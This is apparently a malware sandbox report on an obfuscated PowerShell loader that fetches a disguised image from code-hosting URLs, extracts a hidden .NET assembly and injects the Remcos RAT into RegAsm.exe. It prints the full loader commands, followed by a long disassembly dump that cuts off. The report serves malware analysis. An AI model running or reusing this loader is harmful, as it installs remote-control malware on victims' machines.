#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#GQ#cgBt#G0#c#Bn#Gs#LwBu#Gk#YQBt#C8#cwBk#GE#ZQBo#C8#cwBm#GU#cg#v#GI#c#Bh#Hk#awBz#C8#QQBL#Ek#UwBF#EE#VwBV#EU#SgBJ#C8#bQBv#GM#LgB0#G4#ZQB0#G4#bwBj#HI#ZQBz#HU#YgB1#Gg#d#Bp#Gc#LgB3#GE#cg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                                                            Imagebase:0x7ff6e3d50000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:4
                                                                                            Start time:11:05:11
                                                                                            Start date:21/10/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:6
                                                                                            Start time:11:05:13
                                                                                            Start date:21/10/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                                                                                            Imagebase:0x7ff6e3d50000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:8
                                                                                            Start time:11:05:22
                                                                                            Start date:21/10/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                            Imagebase:0x820000
                                                                                            File size:65'440 bytes
                                                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:9
                                                                                            Start time:11:05:23
                                                                                            Start date:21/10/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:12
                                                                                            Start time:11:05:32
                                                                                            Start date:21/10/2024
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                            Imagebase:0x7ff7403e0000
                                                                                            File size:55'320 bytes
                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Executed Functions

                                                                                              Function 00007FFD341E37B5 Relevance: .0, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2715783465.00007FFD341E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_7ffd341e0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                              • Instruction ID: d8d4b1cd7f2e7c58ce691685c359758c43fd06f701074193dc98c4ab68b6a166
                                                                                              • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                              • Instruction Fuzzy Hash: 2C01677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC3655D636E882CB45

                                                                                              Execution Graph

                                                                                              Execution Coverage:8.6%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:21.2%
                                                                                              Total number of Nodes:2000
                                                                                              Total number of Limit Nodes:61
                                                                                              execution_graph 41911 40f6c6 41926 413a60 41911->41926 41913 40f6cf 41914 4021e0 28 API calls 41913->41914 41915 40f6de 41914->41915 41916 4018e7 64 API calls 41915->41916 41917 40f6ea 41916->41917 41918 402091 11 API calls 41917->41918 41919 40f6f3 41918->41919 41920 4034fa 11 API calls 41919->41920 41921 4105da 41920->41921 41922 402091 11 API calls 41921->41922 41923 4105e6 41922->41923 41924 402091 11 API calls 41923->41924 41925 4105f2 41924->41925 41927 4021c9 11 API calls 41926->41927 41928 413a70 41927->41928 41929 432316 ___std_exception_copy 21 API calls 41928->41929 41930 413a7f InternetOpenW InternetOpenUrlW 41929->41930 41931 413aa7 InternetReadFile 41930->41931 41934 413ac6 41931->41934 41932 40219f 28 API calls 41932->41934 41933 413aef InternetCloseHandle InternetCloseHandle 41935 413b03 41933->41935 41934->41931 41934->41932 41934->41933 41936 40206e 28 API calls 41934->41936 41937 402091 11 API calls 41934->41937 41935->41913 41936->41934 41937->41934 41897 415a94 41898 415b70 CreatePopupMenu AppendMenuA 41897->41898 41899 415aa5 41897->41899 41902 415b8b 41898->41902 41900 415b55 41899->41900 41903 415ab0 41899->41903 41901 415b5b Shell_NotifyIconA ExitProcess 41900->41901 41900->41902 41904 415ab7 DefWindowProcA 41903->41904 41906 415b19 IsWindowVisible 41903->41906 41907 415acc 41903->41907 41904->41902 41909 415b39 ShowWindow SetForegroundWindow 41906->41909 41910 415b29 ShowWindow 41906->41910 41907->41904 41908 415aea GetCursorPos SetForegroundWindow TrackPopupMenu 41907->41908 41908->41902 41909->41902 41910->41902 41938 43fd0e 41943 43fadc 41938->41943 41940 43fd24 41941 43fd36 41940->41941 41953 4490bf 41940->41953 41945 43fb07 41943->41945 41944 434256 __dosmaperr 20 API calls 41946 43fc59 __cftof 41944->41946 41952 43fc50 41945->41952 41956 438517 43 API calls 2 library calls 41945->41956 41946->41940 41948 43fc9a 41948->41952 41957 438517 43 API calls 2 library calls 41948->41957 41950 43fcb9 41950->41952 41958 438517 43 API calls 2 library calls 41950->41958 41952->41944 41952->41946 41959 448a94 41953->41959 41955 4490da 41955->41941 41956->41948 41957->41950 41958->41952 41962 448aa0 CallCatchBlock 41959->41962 41960 448aae 41961 434256 __dosmaperr 20 API calls 41960->41961 41967 448ab3 __cftof CallCatchBlock 41961->41967 41962->41960 41963 448ae7 41962->41963 41968 44906e 41963->41968 41967->41955 41976 44a05d 41968->41976 41970 449084 41971 448b0b 41970->41971 41996 4490df 41970->41996 41975 448b34 LeaveCriticalSection __wsopen_s 41971->41975 41974 43beb5 _free 20 API calls 41974->41971 41975->41967 41977 44a080 41976->41977 41978 44a069 41976->41978 41980 44a09f 41977->41980 41981 44a088 41977->41981 41979 434256 __dosmaperr 20 API calls 41978->41979 41985 44a06e __cftof 41979->41985 42043 43d0a2 10 API calls 2 library calls 41980->42043 41982 434256 __dosmaperr 20 API calls 41981->41982 41982->41985 41984 44a0a6 MultiByteToWideChar 41986 44a0d5 41984->41986 41987 44a0c5 GetLastError 41984->41987 41985->41970 42045 43b5d9 21 API calls 3 library calls 41986->42045 42044 434220 20 API calls __dosmaperr 41987->42044 41990 44a0dd 41991 44a105 41990->41991 41992 44a0e4 MultiByteToWideChar 41990->41992 41994 43beb5 _free 20 API calls 41991->41994 41992->41991 41993 44a0f9 GetLastError 41992->41993 42046 434220 20 API calls __dosmaperr 41993->42046 41994->41985 42047 448e42 41996->42047 41999 449111 42075 434243 20 API calls __dosmaperr 41999->42075 42000 44912a 42061 442506 42000->42061 42003 44912f 42005 44914f 42003->42005 42006 449138 42003->42006 42004 449116 42007 434256 __dosmaperr 20 API calls 42004->42007 42074 448dad CreateFileW 42005->42074 42076 434243 20 API calls __dosmaperr 42006->42076 42034 4490ac 42007->42034 42010 44913d 42011 434256 __dosmaperr 20 API calls 42010->42011 42011->42004 42012 449205 GetFileType 42013 449257 42012->42013 42014 449210 GetLastError 42012->42014 42080 44244f 21 API calls 2 library calls 42013->42080 42079 434220 20 API calls __dosmaperr 42014->42079 42015 4491da GetLastError 42078 434220 20 API calls __dosmaperr 42015->42078 42018 449188 42018->42012 42018->42015 42077 448dad CreateFileW 42018->42077 42020 44921e CloseHandle 42020->42004 42023 449247 42020->42023 42021 4491cd 42021->42012 42021->42015 42025 434256 __dosmaperr 20 API calls 42023->42025 42024 449278 42026 4492c4 42024->42026 42081 448fbe 69 API calls 2 library calls 42024->42081 42027 44924c 42025->42027 42031 4492f1 42026->42031 42082 448b60 72 API calls 3 library calls 42026->42082 42027->42004 42030 4492ea 42030->42031 42033 449302 42030->42033 42083 43e630 23 API calls 2 library calls 42031->42083 42033->42034 42035 449380 CloseHandle 42033->42035 42034->41974 42084 448dad CreateFileW 42035->42084 42037 4493ab 42038 4493b5 GetLastError 42037->42038 42042 4492fa 42037->42042 42085 434220 20 API calls __dosmaperr 42038->42085 42040 4493c1 42086 442618 21 API calls 2 library calls 42040->42086 42042->42034 42043->41984 42044->41985 42045->41990 42046->41991 42048 448e63 42047->42048 42051 448e72 __cftof 42047->42051 42050 434256 __dosmaperr 20 API calls 42048->42050 42048->42051 42050->42051 42087 448dd2 42051->42087 42052 448eb5 42054 434256 __dosmaperr 20 API calls 42052->42054 42056 448ed9 __cftof 42052->42056 42054->42056 42055 448f32 42057 448fb1 42055->42057 42058 448f37 42055->42058 42056->42058 42092 439964 20 API calls 2 library calls 42056->42092 42093 4322e3 11 API calls _abort 42057->42093 42058->41999 42058->42000 42060 448fbd 42062 442512 CallCatchBlock 42061->42062 42094 43ad2a EnterCriticalSection 42062->42094 42065 442519 42066 44253e 42065->42066 42070 4425ac EnterCriticalSection 42065->42070 42072 442560 42065->42072 42098 4422e5 21 API calls 3 library calls 42066->42098 42067 442589 CallCatchBlock 42067->42003 42069 442543 42069->42072 42099 44242c EnterCriticalSection 42069->42099 42071 4425b9 LeaveCriticalSection 42070->42071 42070->42072 42071->42065 42095 44260f 42072->42095 42074->42018 42075->42004 42076->42010 42077->42021 42078->42004 42079->42020 42080->42024 42081->42026 42082->42030 42083->42042 42084->42037 42085->42040 42086->42042 42089 448dea 42087->42089 42088 448e05 42088->42052 42089->42088 42090 434256 __dosmaperr 20 API calls 42089->42090 42091 448e29 __cftof 42090->42091 42091->42052 42092->42055 42093->42060 42094->42065 42100 43ad72 LeaveCriticalSection 42095->42100 42097 442616 42097->42067 42098->42069 42099->42072 42100->42097 39767 42c1d1 39768 42c1dd CallCatchBlock 39767->39768 39794 42bca4 39768->39794 39770 42c1e4 39772 42c20d 39770->39772 39956 42c576 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 39770->39956 39780 42c24c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 39772->39780 39957 43991f 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 39772->39957 39774 42c226 39776 42c22c CallCatchBlock 39774->39776 39958 4398c3 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 39774->39958 39777 42c2ac 39805 42c691 39777->39805 39780->39777 39959 438ab5 35 API calls 5 library calls 39780->39959 39787 42c2ce 39788 42c2d8 39787->39788 39961 438aed 28 API calls _abort 39787->39961 39790 42c2e1 39788->39790 39962 438a90 28 API calls _abort 39788->39962 39963 42be1b 13 API calls 2 library calls 39790->39963 39793 42c2e9 39793->39776 39795 42bcad 39794->39795 39964 42c3c6 IsProcessorFeaturePresent 39795->39964 39797 42bcb9 39965 42e743 10 API calls 4 library calls 39797->39965 39799 42bcbe 39804 42bcc2 39799->39804 39966 4397ac 39799->39966 39801 42bcd9 39801->39770 39804->39770 39982 42ec70 39805->39982 39807 42c6a4 GetStartupInfoW 39808 42c2b2 39807->39808 39809 439870 39808->39809 39984 441239 39809->39984 39811 439879 39813 42c2bb 39811->39813 39988 43bf48 35 API calls 39811->39988 39814 40a1d6 39813->39814 39990 414eed LoadLibraryA GetProcAddress 39814->39990 39816 40a1f2 GetModuleFileNameW 39995 40a60c 39816->39995 39818 40a20e 40010 4021e0 39818->40010 39821 4021e0 28 API calls 39822 40a22c 39821->39822 40016 414384 39822->40016 39826 40a23e 40042 4034fa 39826->40042 39829 40a2a7 40048 4034cf 39829->40048 39831 40a2b5 39833 4034cf 22 API calls 39831->39833 39832 40a25d 40295 40aa8b 116 API calls 39832->40295 39835 40a2c3 39833->39835 40053 402a91 39835->40053 39836 40a26f 39838 4034cf 22 API calls 39836->39838 39839 40a27b 39838->39839 40296 40be14 36 API calls 2 library calls 39839->40296 39846 40a28d 40297 40aa3c 77 API calls 39846->40297 39850 40a296 40298 40a5f9 70 API calls 39850->40298 39851 402091 11 API calls 39853 40a2fc 39851->39853 39855 4034cf 22 API calls 39853->39855 39854 40a29f 39856 402091 11 API calls 39854->39856 39857 40a305 39855->39857 39858 40a334 39856->39858 40077 402077 39857->40077 39960 4389c4 GetModuleHandleW 39858->39960 39860 40a310 40081 4087ef 39860->40081 39862 40a324 39862->39854 39863 40a33f 39862->39863 40084 4139a6 39863->40084 39865 40a34f 39866 4034cf 22 API calls 39865->39866 39867 40a368 39866->39867 40101 414225 39867->40101 39869 40a373 40105 4064d4 39869->40105 39874 4034cf 22 API calls 39875 40a390 39874->39875 39876 4034cf 22 API calls 39875->39876 39877 40a399 39876->39877 39878 4034cf 22 API calls 39877->39878 39879 40a3a2 39878->39879 39880 4034cf 22 API calls 39879->39880 39881 40a3ab 39880->39881 39882 40a41e 39881->39882 39883 4034cf 22 API calls 39881->39883 39884 4034cf 22 API calls 39882->39884 39886 40a3c0 39883->39886 39885 40a429 39884->39885 40117 402178 39885->40117 39886->39882 39886->39886 39889 4034cf 22 API calls 39886->39889 39888 40a43b 40123 40d202 RegCreateKeyA 39888->40123 39890 40a3e4 39889->39890 39895 4034cf 22 API calls 39890->39895 39893 4034cf 22 API calls 39894 40a45d 39893->39894 40129 433426 39894->40129 39896 40a3f6 39895->39896 40299 40900f 31 API calls 39896->40299 39900 40a409 39901 4064d4 28 API calls 39900->39901 39903 40a415 39901->39903 39902 40a495 39905 402178 28 API calls 39902->39905 39906 4034ff 11 API calls 39903->39906 39908 40a4a4 39905->39908 39906->39882 39909 402178 28 API calls 39908->39909 39910 40a4b4 39909->39910 40142 413bcc 39910->40142 39915 4064d4 28 API calls 39916 40a4d0 39915->39916 39917 4034ff 11 API calls 39916->39917 39918 40a4d9 39917->39918 39919 40a4e2 SetProcessDEPPolicy 39918->39919 39920 40a4e5 CreateThread 39918->39920 39919->39920 39921 40a4fa 39920->39921 41863 40a6c0 39920->41863 39922 40a540 39921->39922 39923 402178 28 API calls 39921->39923 40182 40cf8c RegOpenKeyExA 39922->40182 39924 40a514 39923->39924 40177 402a6d 39924->40177 39929 402178 28 API calls 39931 40a52f 39929->39931 39930 40a5ee 40193 4092fd 39930->40193 39934 413bcc 79 API calls 39931->39934 39933 414225 28 API calls 39936 40a56d 39933->39936 39937 40a534 39934->39937 40185 40d0a8 RegOpenKeyExW 39936->40185 39939 402091 11 API calls 39937->39939 39939->39922 39943 4034ff 11 API calls 39946 40a589 39943->39946 39944 40a5b1 DeleteFileW 39945 40a5b8 39944->39945 39944->39946 39948 414225 28 API calls 39945->39948 39946->39944 39946->39945 39947 40a59f Sleep 39946->39947 39949 404c42 39947->39949 39950 40a5c8 39948->39950 39949->39944 40190 40d444 RegOpenKeyExW 39950->40190 39953 4034ff 11 API calls 39954 40a5e5 39953->39954 39955 4034ff 11 API calls 39954->39955 39955->39930 39956->39770 39957->39774 39958->39780 39959->39777 39960->39787 39961->39788 39962->39790 39963->39793 39964->39797 39965->39799 39970 441d48 39966->39970 39969 42e76c 8 API calls 3 library calls 39969->39804 39971 441d61 39970->39971 39974 42c8db 39971->39974 39973 42bccb 39973->39801 39973->39969 39975 42c8e6 IsProcessorFeaturePresent 39974->39975 39976 42c8e4 39974->39976 39978 42c928 39975->39978 39976->39973 39981 42c8ec SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 39978->39981 39980 42ca0b 39980->39973 39981->39980 39983 42ec87 39982->39983 39983->39807 39983->39983 39985 44124b 39984->39985 39986 441242 39984->39986 39985->39811 39989 441138 48 API calls 5 library calls 39986->39989 39988->39811 39989->39985 39991 414f1a GetModuleHandleA GetProcAddress 39990->39991 39992 414f2e LoadLibraryA GetProcAddress 39990->39992 39991->39992 39993 414f46 LoadLibraryA GetProcAddress 39992->39993 39994 414f5a 44 API calls 39992->39994 39993->39994 39994->39816 40300 413b85 FindResourceA 39995->40300 39999 40a639 ctype 40310 40219f 39999->40310 40002 40209b 28 API calls 40003 40a65e 40002->40003 40004 402091 11 API calls 40003->40004 40005 40a666 40004->40005 40006 432316 ___std_exception_copy 21 API calls 40005->40006 40007 40a679 ctype 40006->40007 40316 404964 40007->40316 40009 40a6b0 40009->39818 40011 4021f6 40010->40011 40012 402261 11 API calls 40011->40012 40013 402210 40012->40013 40014 402405 28 API calls 40013->40014 40015 40221e 40014->40015 40015->39821 40402 4021c9 40016->40402 40018 414407 40019 402091 11 API calls 40018->40019 40020 414439 40019->40020 40022 402091 11 API calls 40020->40022 40021 414409 40023 402006 28 API calls 40021->40023 40025 414441 40022->40025 40026 414415 40023->40026 40027 402091 11 API calls 40025->40027 40029 40209b 28 API calls 40026->40029 40028 40a235 40027->40028 40038 40a9e5 40028->40038 40031 41441e 40029->40031 40030 40209b 28 API calls 40037 414397 40030->40037 40032 402091 11 API calls 40031->40032 40034 414426 40032->40034 40033 402091 11 API calls 40033->40037 40410 4151df 28 API calls 40034->40410 40037->40018 40037->40021 40037->40030 40037->40033 40406 402006 40037->40406 40409 4151df 28 API calls 40037->40409 40039 40a9f3 40038->40039 40041 40a9fa 40038->40041 40417 40353b 11 API calls 40039->40417 40041->39826 40043 40353b 40042->40043 40047 403577 40043->40047 40418 4036b8 11 API calls 40043->40418 40045 40355c 40419 4036a1 11 API calls std::_Deallocate 40045->40419 40047->39829 40047->39832 40049 4034da 40048->40049 40050 4034e1 40049->40050 40420 403530 22 API calls 40049->40420 40050->39831 40054 4021c9 11 API calls 40053->40054 40055 402aa0 40054->40055 40421 402ba1 40055->40421 40057 402abb 40425 40206e 40057->40425 40060 404804 40439 40203c 40060->40439 40062 404814 40443 40210e 40062->40443 40065 40209b 40066 4020aa 40065->40066 40073 4020f2 40065->40073 40067 402261 11 API calls 40066->40067 40068 4020b3 40067->40068 40069 4020f5 40068->40069 40070 4020ce 40068->40070 40071 4025a1 11 API calls 40069->40071 40465 402aef 28 API calls 40070->40465 40071->40073 40074 402091 40073->40074 40075 402261 11 API calls 40074->40075 40076 40209a 40075->40076 40076->39851 40078 402082 40077->40078 40079 40208a 40077->40079 40466 40247c 28 API calls 40078->40466 40079->39860 40467 402028 40081->40467 40083 4087f9 CreateMutexA GetLastError 40083->39862 40469 414452 40084->40469 40089 40209b 28 API calls 40090 4139e2 40089->40090 40091 402091 11 API calls 40090->40091 40092 4139ea 40091->40092 40093 40d033 31 API calls 40092->40093 40095 413a3d 40092->40095 40094 413a10 40093->40094 40096 413a1b StrToIntA 40094->40096 40095->39865 40097 413a32 40096->40097 40098 413a29 40096->40098 40100 402091 11 API calls 40097->40100 40477 415327 22 API calls 40098->40477 40100->40095 40102 41423e 40101->40102 40478 4152d6 40102->40478 40104 414246 40104->39869 40106 4064e3 40105->40106 40113 40652b 40105->40113 40107 4035a8 11 API calls 40106->40107 40108 4064ec 40107->40108 40109 406507 40108->40109 40110 40652e 40108->40110 40510 406cb1 28 API calls 40109->40510 40511 406821 40110->40511 40114 4034ff 40113->40114 40115 4035a8 11 API calls 40114->40115 40116 403508 40115->40116 40116->39874 40118 402183 40117->40118 40119 402261 11 API calls 40118->40119 40120 40218e 40119->40120 40515 402387 40120->40515 40124 40d252 40123->40124 40125 40d21b 40123->40125 40126 402091 11 API calls 40124->40126 40128 40d22d RegSetValueExA RegCloseKey 40125->40128 40127 40a451 40126->40127 40127->39893 40128->40124 40130 43343f swprintf 40129->40130 40519 432649 40130->40519 40132 40a46a 40132->39902 40133 415128 AllocConsole GetConsoleWindow 40132->40133 40134 415147 ShowWindow 40133->40134 40135 415150 40133->40135 40134->40135 40554 4377e9 40135->40554 40139 41517c ___scrt_fastfail 40560 413981 40139->40560 40143 413be2 GetLocalTime 40142->40143 40144 413c7d 40142->40144 40146 402a91 28 API calls 40143->40146 40145 402091 11 API calls 40144->40145 40147 413c85 40145->40147 40148 413c24 40146->40148 40149 402091 11 API calls 40147->40149 40150 404804 28 API calls 40148->40150 40151 40a4b9 40149->40151 40152 413c30 40150->40152 40166 413cea GetComputerNameExW GetUserNameW 40151->40166 40681 404779 40152->40681 40155 404804 28 API calls 40156 413c48 40155->40156 40157 413981 76 API calls 40156->40157 40158 413c56 40157->40158 40159 402091 11 API calls 40158->40159 40160 413c62 40159->40160 40161 402091 11 API calls 40160->40161 40162 413c6b 40161->40162 40163 402091 11 API calls 40162->40163 40164 413c74 40163->40164 40165 402091 11 API calls 40164->40165 40165->40144 40689 403509 40166->40689 40173 4034ff 11 API calls 40174 413d58 40173->40174 40175 4034ff 11 API calls 40174->40175 40176 40a4c5 40175->40176 40176->39915 40759 402c69 40177->40759 40179 402a7d 40180 40210e 11 API calls 40179->40180 40181 402a8c 40180->40181 40181->39929 40183 40cfad RegQueryValueExA RegCloseKey 40182->40183 40184 40a558 40182->40184 40183->40184 40184->39930 40184->39933 40186 40d107 40185->40186 40187 40d0d8 RegQueryValueExW RegCloseKey 40185->40187 40188 403509 28 API calls 40186->40188 40187->40186 40189 40a57e 40188->40189 40189->39943 40191 40d460 RegDeleteValueW 40190->40191 40192 